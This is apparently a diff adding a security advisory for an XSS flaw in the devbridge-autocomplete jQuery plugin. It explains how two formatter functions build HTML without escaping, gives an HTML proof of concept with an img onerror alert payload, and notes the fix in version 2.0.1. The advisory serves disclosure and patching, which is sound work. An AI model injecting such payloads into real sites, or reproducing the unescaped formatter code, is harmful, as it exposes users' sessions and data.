+ "details": "### Summary\n\nThe default `formatGroup` and `formatResult` functions in `devbridge-autocomplete` concatenate values into HTML without escaping, allowing XSS when an attacker controls (or can taint) the suggestion data source.\n\n### Details\n\n**1. `formatGroup` — `category` is interpolated raw.**\n\n`src/format.ts`:\n\n```ts\nfunction formatGroup(suggestion, category) {\n return '<div class=\"autocomplete-group\">' + category + '</div>';\n}\n```\n\nIf `groupBy` is used and the grouping field of any suggestion contains HTML, that HTML is executed.\n\n**2. `formatResult` — early-return branch returns `suggestion.value` raw.**\n\n`src/format.ts`:\n\n```ts\nfunction formatResult(suggestion, currentValue) {\n if (!currentValue) {\n return suggestion.value; // un-escaped\n }\n /* ... non-empty path escapes correctly ... */\n}\n```\n\nThe early-return branch is reached when `suggest()` renders with an empty `currentValue`, which happens with `minChars: 0` and a server that returns suggestions for an empty query. The returned string is concatenated into the container's `innerHTML`.\n\n### PoC (formatGroup)\n\n```html\n<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\">\n <title>PoC: formatGroup XSS in jQuery-Autocomplete v2.0.0</title>\n</head>\n<body>\n <input id=\"ac\" type=\"text\" placeholder=\"Type 'a' to trigger\" autocomplete=\"off\">\n\n <script src=\"https://code.jquery.com/jquery-3.7.1.min.js\"></script>\n <script src=\"dist/jquery.autocomplete.js\"></script>\n <script>\n var poisoned = [\n { value: 'Apple', data: { category: \"<img src=x onerror=\\\"alert('XSS via formatGroup')\\\">\" } },\n { value: 'Avocado', data: { category: 'Safe Group' } }\n ];\n\n $('#ac').devbridgeAutocomplete({\n lookup: poisoned,\n groupBy: 'category',\n minChars: 1\n });\n </script>\n</body>\n</html>\n```\n\nOriginally identified by an earlier human analysis; the PoC above was produced with the assistance of Claude Opus 4.7.\n\n### Impact\n\nXSS in pages that render attacker-controllable suggestion data. The actual impact depends on what the embedding page has access to (cookies, session tokens, DOM), per standard reflected/stored XSS.\n\n### Patch\n\nBoth formatters now run their interpolated input through the browser's text-node escaping (`createElement` + `textContent`) before producing the HTML string. Fixed in version `2.0.1`.",
0 commit comments